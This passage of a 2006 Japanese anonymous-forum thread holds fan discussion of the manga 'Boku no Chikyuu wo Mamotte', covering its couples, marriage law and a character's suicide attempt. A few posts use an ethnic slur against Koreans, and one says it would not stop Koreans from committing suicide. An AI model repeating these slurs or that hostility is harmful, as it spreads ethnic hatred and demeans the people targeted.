やっぱ祭典くらいしか男のキチェスと接点もつ機会ないかな?でもそしたら、どうやってモクレンの両親は愛を深めたのかなー

629 :花と名無しさん:2006/09/21(木) 01:57:30 ID:???0
>>628
ひと目みたその日から恋の花咲くこともある。
どっちも常識知らずの天然であるキチェスの出身だということをお忘れなく。

630 :花と名無しさん:2006/09/21(木) 02:57:53 ID:???0
裸で若い男の多い隔離施設なんて思いっきり腐な設定なのに、
パラダイスの実情がほとんど書かれてないしキャラもいないので
全然ネタにされてないよなー。
若い男の性欲事情を考えるとかなりウホッなんだが

631 :花と名無しさん:2006/09/21(木) 06:39:07 ID:???0
>>630
楽園の女の方はそこで従事する人たちも女性限定だろうけど、
男の方も男性限定なんだっけ?
もしそうでなければ、最後まで行かないという条件付の慰安婦がいる可能性も。

632 :花と名無しさん:2006/09/21(木) 08:30:59 ID:???O
「女とやらなければ純潔」というお寺ルールで、
漫画に描けないようなあんなことこんなことが男子楽園であったのかもよ

>>624
うまい

633 :花と名無しさん:2006/09/21(木) 10:32:51 ID:???O
>>631
多分それは男には無理では?
やっちゃうでしょう。
寸止めは慰安どころかストレスの元。多分

634 :花と名無しさん:2006/09/21(木) 11:16:49 ID:???0
案外、男の楽園の方は軍隊式の地獄の訓練の毎日で
性欲を発散する暇もなかったとか。
江戸時代の武士のように「精は漏らさず」が基本で、鉄の規律と訓練で出さないことを求められたとか。

635 :花と名無しさん:2006/09/21(木) 12:03:44 ID:???O
ロジオンはひどい落ちこぼれなんだね

636 :花と名無しさん:2006/09/21(木) 12:17:18 ID:???0
>>634
素っ裸で地獄の訓練か・・・ウホッ
ちょっと田亀源五郎を彷彿とさせる

637 :花と名無しさん:2006/09/21(木) 14:54:54 ID:???O
ちょw
少女漫画板なんで、なるべくそっちに持っていかないように

638 :花と名無しさん:2006/09/21(木) 17:04:45 ID:???0
>>634
夜も明けないうちに訓練開始、飯は鰯と芋を適当に混ぜただけ。
一日の絶え間ない訓練が終わって寝た後は、古兵たちによる私的制裁とチャリンコ漕ぎの毎日。
一ヶ月に一度くらいは、新聞の端っこに「縊死」と記されたキチェスが出てくると。

639 :花と名無しさん:2006/09/21(木) 17:36:21 ID:???0
>>634-635
そういう事なら、木蓮母が木蓮父に同情して結婚して救ってあげようとしたのも頷けるw

そういや木蓮はまだ幼かったから「キチェが消えたのに短命のままなの?」って
疑問が出たのだろうが、本当にそういう設定だったら男のキチェス達はどうしただろう?
神に仕える身として短命の運命すら受け入れるか、
やはり生存本能が働いて神に背いてもキチェを捨てるのか。

640 :花と名無しさん:2006/09/21(木) 19:41:24 ID:???0
>>634
私はスパルタ(古代ギリシアの都市国家の方)を思い出してしまったよ。
こっちは素っ裸で地獄の訓練だけではなく、幼い内に(男の子は)
親元から離されて施設に集められるという点も。


641 :花と名無しさん:2006/09/21(木) 21:37:15 ID:???0
>>640
いざとなったら300人のキチェスで3万人の敵兵を殺すわけだな。

642 :花と名無しさん:2006/09/22(金) 09:59:07 ID:???0
連載途中までは桜と大介がくっつくもんだとばかり思ってた。
迅八たちと再会するまでは、二人きりで前世の話をしたり仲間を探してたのだろうし、
OVAのエンディングのツーショットもお似合いでいい感じだし。

そして前世でも木蓮とは違って微妙に愛がある「変な顔」発言と、
その後エンジュとアイドル扱いしてた事からも、
イジりやすく親しみやすい感じで仲が良かったのだろうし。
そして転生後はイケメンとまでは行かなくても、それなりの顔になってたし。

一成とは時々微妙にフラグらしき物は立ってたけど、基本は女同士の親友だったし、
桜自身も「ずっと親友でいてあげるわよ」と言ってたからまさかくっつくとは。

643 :花と名無しさん:2006/09/22(金) 11:15:00 ID:???0
桜と一成は男と女だとはっきりするようなエピがあったらよかったのにね。
一成の男っぽさが出るとか、桜の女っぽさが出るとかで、
そこにお互い惚れたとか・・・

644 :花と名無しさん:2006/09/22(金) 11:52:52 ID:???O
そのあたりは後出しだったね
性欲で結婚する奴は性欲で別れるもんだぞ、一成

645 :花と名無しさん:2006/09/22(金) 12:54:47 ID:???0
親友ってことはもともと人間として好きってことだからなあ…
その上お互いフリーだったらくっつくのも当然じゃないかな。
そういうケースって現実でもよく見るし

646 :花と名無しさん:2006/09/22(金) 13:20:37 ID:???0
普通の男女の親友なら分かるけど、前世で女同士での親友だったのが
前提だからなぁ。一成は男にモテるほどの美少年という設定みたいだし、
桜が一成をエンジュではなく男として見るまでの過程が欲しかった
(その逆で、一成が桜を恋愛対象として見るようになった過程も)

まぁ後半では暴走しそうな迅八を一成が怒鳴って殴って説教するって
場面がかなり多かったから、一成の男らしさがうpしてたのかもしれんけど

647 :花と名無しさん:2006/09/22(金) 16:21:19 ID:???0
最初は一聖も桜も他の人と付き合っていたけど、ほぼ同時期に振られて
互いを慰めあっているうちにその気になったとか。

この2人なら出来婚を許せたな。正確に言えばそうでもしなければ納得出来なかったよ。

648 :花と名無しさん:2006/09/22(金) 17:01:45 ID:???0
婚約した時に一成が「事もあろうに桜なのに感じてしまう」と、
桜に欲情したのが不覚みたいな発言してたけど。
あれって桜が月基地メンバー内では女としての魅力を評価されてないからではなく、
単に前世で同性の親友だったからだよね?
もし前者なら桜カワイソス。

本当に、前世が女で木蓮大嫌いだった一成以外、
どうしてことごとくみんなありすの方に行くかね?
桜も行動や性格に多少問題あったかもしれないけど、
ありすだって特別優しい訳でもないしウジウジしてイラつく人はイラつくだろうに。

649 :花と名無しさん:2006/09/22(金) 17:08:40 ID:???0
あと、高校で同級生だった迅八→ありすやお隣さんだった輪×ありす、
会合以外でもしょっちゅう連絡取り合ってたっぽい一成×桜はともかく、
春や大介はよっぽど身近にいい女がいなかったのかと小一時間(ry

650 :花と名無しさん:2006/09/22(金) 17:16:13 ID:???0
アリスが現世でも木蓮並の容姿とか頭のよさを
持っていれば、一成以外の男全員がアリスへ
走っても納得出きるけど、アリスは現世では
「歌が上手くて植物の気持ちが分かる、ちょっとキレイな普通(?)の女の子」
の設定のはずだからなぁ。
春でも「何で?」と思うのに、大介は一体いつどこでどういうキッカケで、
人妻になっても想い続けるほどアリスに惚れたのか分からん。
春はイケメンで女の子にモテモテだし、大介も一流大学へ進学してて
そこそこの容姿だろうから女の子が放っておくわけがないんだが

651 :花と名無しさん:2006/09/22(金) 17:50:41 ID:???0
春彦は学校あんまり行ってないし
大介は勉強できるといってもそれでもてるってことはないしなあ

652 :花と名無しさん:2006/09/22(金) 18:02:08 ID:???O
なんだか結局、いまだにみんな前世に縛られてカワイソス人生のような。

653 :花と名無しさん:2006/09/22(金) 18:20:20 ID:???0
お互いの気持ちが通じ合ってなかったとはいえ、
婚約者として最後の時まで一緒に過ごした紫苑×木蓮や、
他に彼女がいようが好きな女がいようが一途に想い続け、
念願叶って一夜を共にする事も出来たエンジュなどは、
来世でも好きな気持ちがしばらく残るのはまだ分かる。

しかし玉蘭のようにココやエンジュなど他にもふらつける相手がいたり、
秋や柊のように相手に親友や仲間としか思ってもらえず、
おそらく(身体でなくて精神面で)深い付き合いもしてなかったはずの彼らが、
転生して再会した直後だけでなく、事実上振られた後も思い続けるのは納得出来なかったり。
しかも前世と外見もしくは性格が本人そのまんまならともかく、結構変わってるのに。

654 :花と名無しさん:2006/09/22(金) 18:36:42 ID:???0
作者がアリスと輪マンセーだから仕方ない。

そういやぼく地球最終話のアリスが成長した輪を説明するコマに噴いたな。
手足長いとか、とにかくマンセーしまくっててワロタ

655 :花と名無しさん:2006/09/22(金) 23:42:19 ID:???0
作者=ありす
作者の理想=輪
なのかもしれん。。。

656 :花と名無しさん:2006/09/22(金) 23:43:46 ID:???0
春彦の場合、自分の容姿そのものがトラウマになってるだろうから
その容姿で寄ってくる女には惹かれなさそうな感じ。
大介は…東大生ってあれで結構ダブルスクールその他で大変らしいよ。
要領悪いと彼女作ってる暇などなかろう。
仮にも前世は1独立基地の最高責任者まで勤めた彼が、要領悪いかはさておき。

657 :花と名無しさん:2006/09/23(土) 00:16:28 ID:???0
柊は仕事に関しては有能だったけど、それに夢中になりすぎて
彼女を作る余裕がなかったという点で要領が悪かったと、いう事も考えられるよ。

658 :花と名無しさん:2006/09/23(土) 01:48:32 ID:???0
>>646
前世で男女だったとはいえ今生では男同士なのに一成は友人に
血迷ってますよw

659 :花と名無しさん:2006/09/23(土) 01:59:26 ID:???0
>>658
そりゃしょうがないんじゃないか?あの時期の一成は前世の自分に引きずられまくってたし。
なまじ美形で、女みたいとかなんとか妹にまで言われてたのも引き金になったろうし。
せめて男くさい顔つき体つきに生まれ変わってればそういうこともなかったかもしれない。

660 :花と名無しさん:2006/09/23(土) 06:02:55 ID:???0
>>656-657
二人に彼女が出来なかった理由はその辺りで説明出来そうだけど、
だからってありすを好きにさせる必要ないだろうって思うんだよね。
独身の理由もたまたまいい女性と縁がなかったとか、
仕事の方に燃えてしまったとかいくらでも理由つけられるし。

それに本編からずっと引っ張ってる迅八や、
輪とありすそれぞれと不思議な友情を育んでる春はともかく、
大介がありすスキーな事による話をわざわざ作ってもらえるとは思えないし。
というか、彼らって今後出番あるの…?
結構長く続いてるのだから、チョイ役でも出してあげればいいのに。


661 :花と名無しさん:2006/09/23(土) 10:57:15 ID:???O
>>652
うんうん、ほんと同感……

662 :花と名無しさん:2006/09/23(土) 11:05:49 ID:???0
>660
もう出ないほうがいいよ
日渡さんが彼らを良く描くとは到底思えん
またありすに惚れてるとか輪に心服してるとか
余計な設定を足されるのは目に見えてる

663 :花と名無しさん:2006/09/23(土) 11:29:35 ID:???0
前にも出てたけど、一成桜夫婦に子供がいないのも他の男性陣が全員独身なのも、
「月基地メンバーでの子供は蓮だけだから、蓮は俺達だけの子じゃない」
という輪のセリフが示すように、小林一家マンセーの為なんだよね。

でも、血の繋がりがある訳でも毎日のように会ってて情が移ってるって訳でもない、
単なる親友の子を自分の子のようにとまでは思えないと思うのだけど。
特に独身男性なんてよほどの子供好きでもなければ、基本的に他人の子に興味ないだろうし。
まさか「惚れた女の子供だから、例え自分が父親でなくとも愛しい」とか?
だから全員ありすに惚れさせる必要があった?

664 :花と名無しさん:2006/09/23(土) 12:35:57 ID:???0
桜&一成夫婦が不妊で悩んでたら、蓮とか見るの辛いと思うんだけどな〜・・・

665 :花と名無しさん:2006/09/23(土) 12:50:49 ID:???0
火渡りのアホさ故の非常識に無理に理屈をこねなくてもいいよ。

666 :花と名無しさん:2006/09/23(土) 13:52:38 ID:???0
>>663
>「惚れた女の子供だから、例え自分が父親でなくとも愛しい」

秋里和国の漫画「the B.B.B」にこんな台詞があったよ。
最もその台詞を言った男は主人公と未入籍ながら結婚生活
を送っていたんだけどね。(ちなみに主人公にはもう1人夫がいて
その夫達も互いに式を挙げている)

この漫画のラストもぼく地球と違う意味でモニョッたよ・・・

667 :花と名無しさん:2006/09/23(土) 15:40:24 ID:???0
>>664
そう考えると、桜って実はかなり出来た人間だよね。
もちろん誰でも表面では平静を装う努力をするだろうけど、
別に適度に可愛がるだけでも充分なのに、
ラブラブ光線まで出しまくりなのは難しいかと。
素でそれだけ子供好きだって事なら、なおさら桜と一成が可哀相だ。

輪は「”まだ”授からない」といかにもいずれは出来るような言い方をしていたが、
いくら努力したってなかなか出来ない人もいるし、
日渡さんが放置せずにその辺の描写をちゃんとしてくれるかどうかも怪しい。

668 :花と名無しさん:2006/09/23(土) 17:54:04 ID:???0
単純に蓮を月の子供第一弾にしたかっただけだと思う。
紫苑や木蓮が守護霊やってる意味も入れたかったみたいだし。

そのうち他の毒男もとっとと結婚させろやと思うけど。

669 :花と名無しさん:2006/09/23(土) 18:26:47 ID:???0
ラストで思わせぶりだった、迅八を好きになった輪の同級生の子
(ココ似だが生まれ変わりかは未確定)とはどうなったのだろう?

・初めて好きになってくれた女の子(?)なので本当にまんざらでもなかっただけで、
 本命はありすのまま。よってどうにもならなかった。
・元々輪から迅八にあっさり乗り換えるような子なので、すぐ飽きられた(その軽さもココ似?)。
・子供特有のハシカのような憧れだったので、成長したらあっさり冷められた。
・あの時点もしくは成長してから少し付き合ったが、何らかの理由で破局。迅八の気持ちは再びありすへ。

670 :花と名無しさん:2006/09/23(土) 19:07:38 ID:???0
・日渡早紀自身が忘れてる。もしくは興味がない。

671 :花と名無しさん:2006/09/23(土) 19:17:51 ID:???0
>>670
輪の妹はすっかりスルーかと思ったけど出てきたよね。
まあ小林家絡みじゃないと出してもらえなさそうだから、
「やっぱりあなたが忘れられないの!」と略奪狙いのありすのライバルとして出すとか?
そういやありすは結婚しても複数の男に惚れられてマンセーされてるのに、
輪を好きな女の子ってあの子以来出てきてないよね。
小六の時点ではかなりモテてるって設定だったのに。

672 :花と名無しさん:2006/09/23(土) 20:08:41 ID:???0
>>669
・その事実を知った女の子の両親が別れさせた。
 普通の親だったら、小学生の娘が高校生の男とくっ付こうとしたらそうするよ。

673 :花と名無しさん:2006/09/23(土) 20:13:03 ID:???0
>>672
ま、普通はそうだよね。
輪とありすがそれぞれの両親にも認められたのは、
女の方が年上だからって訳ではなくあの事故があったからか。
逆にあれがなかったら双方の両親から猛反対されて、
出来婚なんてもってのほかだったかも。

674 :花と名無しさん:2006/09/23(土) 20:16:58 ID:???0
仮に男も16歳で結婚が認められてたとしても、
高校入ったばかりの男が結婚して父親になるなんて、
どちらの両親にしても心配で認めたくないよね。
高校に通ったままでも辞めて働くにしても色々問題があるだろうし。

675 :花と名無しさん:2006/09/24(日) 02:07:37 ID:???O
季〜節の〜た〜め 月は〜つくら〜れ〜
太陽その〜沈むとこ〜ろを知る〜♪が、好き

676 :花と名無しさん:2006/09/24(日) 02:11:18 ID:???0
輪は株で出産費用を稼いだに1000キチェス

>>673
輪ママは最初「万が一後遺症が出てしまった時の為に
亜梨子に責任を取ってもらいましょう」と考えて2人の婚約を
許したかも知れないしね。

輪の方は不可能だけど、実は麒麟が16歳で結婚するのは現実的にも可能なんだよね。

677 :花と名無しさん:2006/09/24(日) 03:15:10 ID:???0
>>673
まあ普通の親ならそもそもそんな子供の非常識を心配するか、
お互い大学にでも通って人付き合いが広まり、たわけた考えを持たせないようにするかどっちかだよな。
これが12年後、23歳と29歳くらいならまだ常識の範囲内だし。

678 :花と名無しさん:2006/09/24(日) 04:32:58 ID:???0
>>676
>輪の方は不可能だけど、実は麒麟が16歳で結婚するのは現実的にも可能なんだよね
そんな設定あったっけ?それとも成長した姿で周囲をごまかせれば、って事?
戸籍の問題はあるけれど。

>>677
重箱の隅ですまないが、ありすと輪なら23と32では?
まあそれでも本人達の強い意思によっては許せるであろう年齢差だけど。

679 :花と名無しさん:2006/09/24(日) 14:26:01 ID:???0
>>678
氷樹の母国、イギリスでは男女共16歳で結婚出来るんだよ。

日本では国際結婚で産まれた子供は両親の国籍が違う場合二重国籍で
22歳になるまでにどちらかの国籍を選ぶ事になっているけど、
(つまり日本人の夏寿輝と英国人の氷樹の間に産まれた麒麟は実際には
日本と英国の両方の国籍保持者)麒麟が16歳になるまでに英国の国籍を選べば
結婚出来るんだよ。

ついでに氷樹の場合は日本国籍の父親に出生後認知され子供で、日本の法律ではこの場合
3年以上日本に滞在して帰化申請をしなければ日本国籍を取得できないんだって。
(この時麒麟が母親と一緒に日本国籍を選らんだら16歳で結婚は不可能)

日渡さんはその事を知っているかどうか分からないけどね。

680 :花と名無しさん:2006/09/24(日) 15:26:55 ID:???0
>>679
なるほど、サンクス。無知でスマソ。
しかし日本の法律すらよく把握してなく、
イギリスの取材を面倒臭がってしなかった日渡さんが、
そんな法律を知ってるとはとても思えない。

681 :花と名無しさん:2006/09/24(日) 15:44:03 ID:???0
オマエラ知ってるか?
精液ってのはアルカリ性の前立腺液と精子でできてんだ
あのすえた匂いはアルカリ性特有なのさ
なぜアルカリ性かってゆーとだな、
女の膣内は酸性だからだ
つまり、酸に弱い精子を守ってるわけだな
人間って不思議だと思わないか?

682 :花と名無しさん:2006/09/24(日) 19:29:13 ID:???0
>>680
わかったから無知なババァはもう来なくていいよ

683 :花と名無しさん:2006/09/24(日) 23:37:38 ID:???O
こら!
日渡の悪口言うな!

684 :花と名無しさん:2006/09/25(月) 02:03:04 ID:???0
国籍の事にやけに詳しくて下品な物言いする人間と言えばチョン以外考えられない

685 :花と名無しさん:2006/09/25(月) 10:28:09 ID:???0
なんでそういう方向へ持って行こうとする・・・

686 :花と名無しさん:2006/09/25(月) 13:47:08 ID:oJMx+RFS0
木蓮て足くさそうだお

687 :花と名無しさん:2006/09/25(月) 15:43:45 ID:D+/50R800
ぼく地球を久しぶりに読み返している途中なのだが、
序盤の途中でさくらと一成がしきりに春の自殺未遂の理由を
確かめようとしているがあれはなぜ?
そりゃあ、あのときの春は紫苑として振舞っていて
みんなからみると意味不明な行動をしているように見えるかもしれないが
でもだからといって自殺未遂の原因を確かめる、なんて
あまりにもデリカシーがないと思いません?
一体さくらたちは何を期待しているのって思ってしまうよ。
紫苑というキャラにあまりにも似つかわしい行動だから不信に思うのは
判るのですが、田村さんにまで聞く事かなぁ。

あと、コミックスの2巻の予告(一番最後のページ)で「輪君!待ってェ・・」みたいな
コマがあるんですが、あれは完全に日渡さんのお遊び?
昔、いつになったらあのシーンがでてくるの?と探してしまったのですが。
それとも当時の花とゆめにはああいうコマがあったの?

688 :花と名無しさん:2006/09/25(月) 16:31:53 ID:???O
>>687
君は友達が自殺未遂しても原因は何だったのだろう
とか思ったりしないのかね

689 :花と名無しさん:2006/09/25(月) 17:04:01 ID:???0
つーか、普通人が自殺しようとしてたら
止めようとするのが人間として当然だろ。
その過程で原因を知ろうとするのも当たり前。
>>687は非常識以前の馬鹿じゃね?

690 :花と名無しさん:2006/09/25(月) 18:08:10 ID:???O
>>687は馬鹿

691 :花と名無しさん:2006/09/25(月) 18:22:31 ID:???0
いや、春と桜&一成は前世つながりの仲間というだけで
そこまで仲良かったわけでもないはず(あの時点では)

迅八と一成のような親友や、桜と大介のような友達なら
分かるけど、そこまで親しくもない相手の身の上を
周囲に聞きまわってまで首突っ込むのはどうよって事じゃないの。

692 :花と名無しさん:2006/09/25(月) 18:30:06 ID:???0
仲がいいとか悪いとかの問題ではなく目の前で知り合いが自殺しかけたら何らかの行動起こすだろ

693 :花と名無しさん:2006/09/25(月) 18:43:57 ID:???0
いやだから目の前で知り合いが自殺しかけたら止めるのは当然だが、
その自殺の原因を聞きまわるのは、それほど仲が良いわけでもないなら
どうなんだって話だろw

694 :花と名無しさん:2006/09/25(月) 18:49:13 ID:???0
確かにあの時点では紫苑(実は秋だけど)と判明して
会合に一、二回参加しただけの間柄だったし、皆揃って
春のことを疑いの目で見てたからなぁ。
知り合い ではあると思うけど、友達では無かったと思う。
春の自殺未遂の原因がムーンドリーム関連だったから、田村に
聞き込みしたりした行動は結果的に良かったと思うけど、
もしソレが家庭のこととか学校のこととか個人的な悩みだとすれば
聞き込みされたりしたら、私ならちょっと嫌かも。

695 :花と名無しさん:2006/09/25(月) 19:42:31 ID:???O
わかったからもうこの話やめれ
メンヘル池

696 :花と名無しさん:2006/09/25(月) 19:47:27 ID:???0
何でいきなり「メンヘル」呼ばわり?
こうした議論はこのスレじゃ普通だろw

697 :花と名無しさん:2006/09/25(月) 19:51:56 ID:???0
ワケ分からんね。
論破されて言い返せなくなったから
メンヘル池と言ったんじゃないの。

698 :花と名無しさん:2006/09/25(月) 20:17:43 ID:???0
うるせー馬鹿
馬鹿馬鹿馬鹿馬鹿馬鹿馬鹿馬鹿馬鹿

699 :花と名無しさん:2006/09/25(月) 21:00:32 ID:/+FiKifP0
木蓮は口くさいお

700 :花と名無しさん:2006/09/25(月) 21:06:22 ID:???O
テスト

701 :花と名無しさん:2006/09/25(月) 21:16:47 ID:???O
論破もしてないだろ
二人は月絡みだと直観的に感じたんだと思う
みんな頭の中は月の事で一杯だろうし、
調べてみて家庭の事なんかであるなら
まぁ、それ相応の対応をしたって事では?

702 :花と名無しさん:2006/09/25(月) 22:25:02 ID:???0
ったく、何てアホなこと…言うのや……!
普通は自殺未遂なんてやったら知り合いレベルでも
理由を確かめるだろうが…ッ。
それすらも出来ないなんて、うっすい友情だなぁ?
それはおせっかいだって言う時点で、自分の友情関係の薄さを晒してるって気付くこったな。

703 :花と名無しさん:2006/09/25(月) 22:34:22 ID:???0
きめぇ

704 :花と名無しさん:2006/09/25(月) 22:37:32 ID:???0
ありすが輪とやっちゃうなんてキモイぐらいの叩きはまだ分かるけど、
仲良くないのに自殺の後にあれこれ係わり合いになりすぎで怒るんじゃ理屈として変だよ。
月仲間として関わった以上自殺に走った動機を探してなんとかしようと思うのも普通の人情。

705 :花と名無しさん:2006/09/25(月) 22:40:07 ID:???0
しかし自分が春ちゃんの立場だとして、月と無関係の
悩みを抱えてたとしたら余計なお世話だと思うだろうなぁ。

という風に、
ここら辺の感覚は人それぞれだから、これ以上は平行線になりそうだし止めといたら?

706 :花と名無しさん:2006/09/25(月) 23:00:48 ID:???0
まあ実際、別に春彦は家庭の悩みや進学だのなんだので自殺未遂起こしたわけじゃないし。
結果よければすべてよしじゃん。
仮定の話で詮索はよくないだの言っても空しいだけ。

707 :花と名無しさん:2006/09/25(月) 23:16:42 ID:???0
やめらんねーよ。
ここでやめちまったら、詮索しないのが正しいって思う奴が出ることになっちまう。
そんなの悲しいじゃん。
やっぱさ、何つーの?
友達…って、色んなキッカケがあるけど、きっと、何でもないようなことで、
お互いを知り合って、支えあえると思うんだ。
だから、はなから壁つくんねーでさ。
相手を知って助けようって…そう思う人が増えて欲しい。
だから、終わらせちゃいけねーんじゃねーかなあ?

708 :花と名無しさん:2006/09/25(月) 23:17:42 ID:???O
春が自殺未遂しても誰も関心持たなくてあっそって感じだったら良かったのかよ
さっきからデリカシーだの熱演してる人

709 :花と名無しさん:2006/09/25(月) 23:31:51 ID:???O
>>687
輪くん待ってェのページ実際なかったっけ?
なんかありすがそういう夢を見るの。
そっちへ行っちゃダメよ、待って〜みたいに。

710 :花と名無しさん:2006/09/25(月) 23:35:03 ID:???0
お前らなかなか熱いぜ

711 :花と名無しさん:2006/09/25(月) 23:35:47 ID:???0
そんなこと誰も言ってないだろw
「大丈夫?」「なんかあったら相談してよ」とか声掛けるのはいいけど
理由を他人に聞いて回るのは、普通ならちょっとアレだなって話なだけで。

712 :花と名無しさん:2006/09/25(月) 23:37:48 ID:???0
ざけんなコラ
自殺未遂した知り合いがいたら理由を知るのは当然だろうが
おせっかいも何も人の命かかってんのに、悠長に何もせず待ってんのか?
残念ながら俺らはそうじゃねーんだわ。
お前みたいな腐った奴は他人に心配されないから分からないんだろうが
普通は心配だったら理由を突き詰めて助けようとすんだよ
分かったら二度と「お節介」「聞いて回るなんてデリカシーない」とか言うな

713 :花と名無しさん:2006/09/25(月) 23:39:36 ID:???0
熱すぎてきめえ
もうどっちでもいいから消えてねw

714 :花と名無しさん:2006/09/25(月) 23:50:39 ID:???0
それはつまり人が自殺未遂で苦しんでても見捨てるやつに対して放置しろってことか?
>>713よ、お前も馬鹿だな

715 :花と名無しさん:2006/09/25(月) 23:56:08 ID:???0
>>712
ぼく地球世代?ぼく月世代?

716 :花と名無しさん:2006/09/26(火) 01:01:06 ID:???0
ま、目の前で人が死ぬかどうかって時にデリカシーがどうのこうのと寝言をほざいて
何も行動しない人間ってのは、そもそもまともな道徳や倫理ってのを知ってるのかねえ?
これだから頭でっかちの現代人は馬鹿が多いという。

717 :花と名無しさん:2006/09/26(火) 01:05:44 ID:???0
だから目の前で自殺をしそうな人間を止めないとは書いてねーだろヴォケ
未遂歴のある奴に対して根掘り葉掘り聞くのは必ずしも良いこととは言えないと
言ってるだけだろう。ちゃんと嫁

718 :花と名無しさん:2006/09/26(火) 01:07:14 ID:???0
俺の知り合いは急に自殺したけど、自殺しかけた理由を
調べようとしないなんて最低だな。調べて迷惑なんて誰が決めた?

719 :花と名無しさん:2006/09/26(火) 01:09:06 ID:???0
自殺未遂の理由を調べろ派熱すぎ&怖すぎ。落ち着けよ

720 :花と名無しさん:2006/09/26(火) 01:13:23 ID:???0
落ち着いてられっかよ…ッ。
このまま見過ごしたら、第二第三のシオンや春を生み出すことになる。
アンタはそれでいいかもしれないが、俺には耐えられない。
…すまねぇ、ちょっと…熱くなりすぎたかな。
でも覚えておいてくれ。
生死が関わっている時に、知り合いもデリカシーも関係ねぇんだってこと。
俺も自殺未遂したけど、支えてくれた奴には感謝してっから。

721 :687:2006/09/26(火) 01:22:14 ID:???0
なんだかスレを荒らすような話題を振ってしまってごめんなさい。
帰ってきたらすごいことになっていて驚きました。
私があのように書いたのは
春彦自身が事故だったといっている(し、そう思わせたい)のに
たいして親しくない人たちが田村さんにまでわざわざ聞きに言って
首を突っ込むのはどうなのかなと思っただけなのです。
人に簡単に話せないから自殺するまで追い込まれているわけだし
結果的に、前世関連だったので良かったのですが
違う可能性だってあるわけだし、ともすると
桜たちは好意でやっていることでも興味本位のようになってしまって
理由によっては更に春を追い詰める事にもなるのでは?と考えてしまったので。
実際、春は田村さんにすら最初は話すことが出来なかったし。

色々な考え方がありますが、事故と本人が言っているのなら
自分はそれ以上介入するべきではないなと思ってしまうほうだし
自分が春だとしても、桜や一成のような付き合い程度の人にまで
自殺未遂の原因を知って欲しくはないし探って欲しくもないと思う性質なので。

なんにせよ、気分を害された方々、申し訳ありませんでした。

自分も含めて介入されすぎるのを嫌う人もいるのかなと思ってしまっただけです。
ごめんなさい。


722 :花と名無しさん:2006/09/26(火) 01:24:32 ID:???0
↓介入しなければ許さない派、怒りの書き込み開始

723 :花と名無しさん:2006/09/26(火) 01:28:03 ID:???0
>>720
未遂で終わったなら生きてかなきゃならないんだから、その人の負担に
なるような事は避けたいと思うってのもアリでしょう。
あなたのそばには居なかったようで何よりだけど「かわいそうな人」に寄生して
悦に入るタイプの人とかも結構居るし。

しかし熱いなーバンドマンぽい。てか自分がファンやってるとこの人と文体が一緒

724 :花と名無しさん:2006/09/26(火) 01:42:07 ID:???O
白熱し過ぎてあがってるを

725 :花と名無しさん:2006/09/26(火) 01:51:31 ID:???0
>>721
私も同じように感じたよ。
あの時の二人は興味本位で詮索している風に描かれていたし
一成もこういうことはよくないみたいに言ってた気がする。

726 :花と名無しさん:2006/09/26(火) 02:34:50 ID:???0
何を馬鹿馬鹿しい自演してるんですか人格悪魔さん

727 :花と名無しさん:2006/09/26(火) 02:39:03 ID:???0
チョンが自殺する分には止めません

728 :花と名無しさん:2006/09/26(火) 02:46:17 ID:???O
詮索は良くないと言いつつ一成も気になる点があったようだよ
世間一般の欝への対応とかは少し置いといて、
あの特殊な七人の中で自殺未遂なんてあれば
詮索したくなるでしょうよ…
春から何かを隠してるような匂いプンプンするし。
周りから話を聞いてみて、月過去と関係ないなら
それ以上は無理しないだろ

729 :花と名無しさん:2006/09/26(火) 04:56:26 ID:???0
第2第3のシオンて。
これはフィクションです、て書いてあるやん。

普通「聞いていいのか悪いのか」っていう葛藤があると思うんだけど
その葛藤があんまり描かれなかったから「聞くのはどうよ」と思う人がいてもしょうがない。

730 :花と名無しさん:2006/09/26(火) 07:59:37 ID:???O
ゆうべのヤバい人消えた?
自殺未遂だったら家族や親友がサポートするのはわかる。
それ以外の人が詮索したり世話焼いたりしたら、今後生きていけないじゃん。
腫れ物扱いされた負い目を死ぬまで持っていくんだよ。
付き合いづらいわ。
私が自分未遂者ならスルー希望。理由を言いたかったら自分で言うよ。

731 :花と名無しさん:2006/09/26(火) 09:43:44 ID:???0
>>12
やけに親中国だから、このきっこってのもチョンの手先だなw

732 :花と名無しさん:2006/09/26(火) 09:50:22 ID:???O
また白熱してたのか〜オバサンパワーはすごいね

733 :花と名無しさん:2006/09/26(火) 09:55:29 ID:???0
オバサンオバサンとうるさい煽りもいい加減UZEEEE
自分がオバゆえの同属嫌悪か知らんけど、自殺論白熱してるやつもどっちも消えてね

734 :花と名無しさん:2006/09/26(火) 09:57:53 ID:???0
一人二役ご苦労様です
まるっとお見通しだ

735 :花と名無しさん:2006/09/26(火) 10:02:21 ID:???0
同意!
http://hp-sv.facty.net/index.php
このIPIDチェッカーで全部お見通しです。
同一人物の多いこと・・・

736 :花と名無しさん:2006/09/26(火) 11:48:02 ID:???0
おお。IPIDチェッカー凄い
聞きまわるのはデリカシーが無いとか言ってるやつの
書き込みってほぼ同一人物だしw

softbank2190622***57.bbtec.net
(↑自演しまくってるやつのリモホ)


737 :花と名無しさん:2006/09/26(火) 14:24:10 ID:???O
自演してる人ってあれとあれ?
わざわざスレが荒れてるように見せてるってわけか。
なんなんだろうな。

738 :花と名無しさん:2006/09/26(火) 14:31:02 ID:???0
>>737
チェッカー使って怪しい書き込み見てみ。
ほっとんど同じ人って分かるから


739 :花と名無しさん:2006/09/26(火) 14:35:47 ID:???0
ここID出ない板だからほとんどの住人はID分からないし、
仮に分かっても>>735のは一人一日一件って決められてるから、
そんな即自演しまくりなんて分からないと思うのだけど。

740 :花と名無しさん:2006/09/26(火) 14:36:55 ID:???0
チェッカーで出てくるIPは自分のだよ。
一日一回だけ他人のIPが調べられると見せかけたジョークツール

741 :花と名無しさん:2006/09/26(火) 15:13:06 ID:???0
>>722
ゲラ

742 :花と名無しさん:2006/09/26(火) 19:43:50 ID:???O
>>733
若くてうるさくてごめんね…

743 :花と名無しさん:2006/09/26(火) 21:27:47 ID:???0
>>664
>桜&一成夫婦が不妊で悩んでたら、蓮とか見るの辛いと思うんだけどな〜・・・

輪が「2人の間にまだ子供はいない」と 言っていたから実は不妊治療をしているんじゃないか
とも思ったけど、やっぱり蓮マンセーの為に子梨夫婦にされたというのが有力だな。
(最終回で子供が産まれるかも知れないけど)

うてなの青華&大悟もキャラ夫婦の仲で唯一の子梨カップルだけど、せいぜい24〜25歳だから
その年齢じゃまだ子供のいない人の方が多いんだよね・・・



744 :花と名無しさん:2006/09/26(火) 21:41:10 ID:???0
>>743
苺や夜子達がたまたま子供が出来たから結婚が早いだけで、
清華達は結婚してまだそんな経ってないんじゃ?
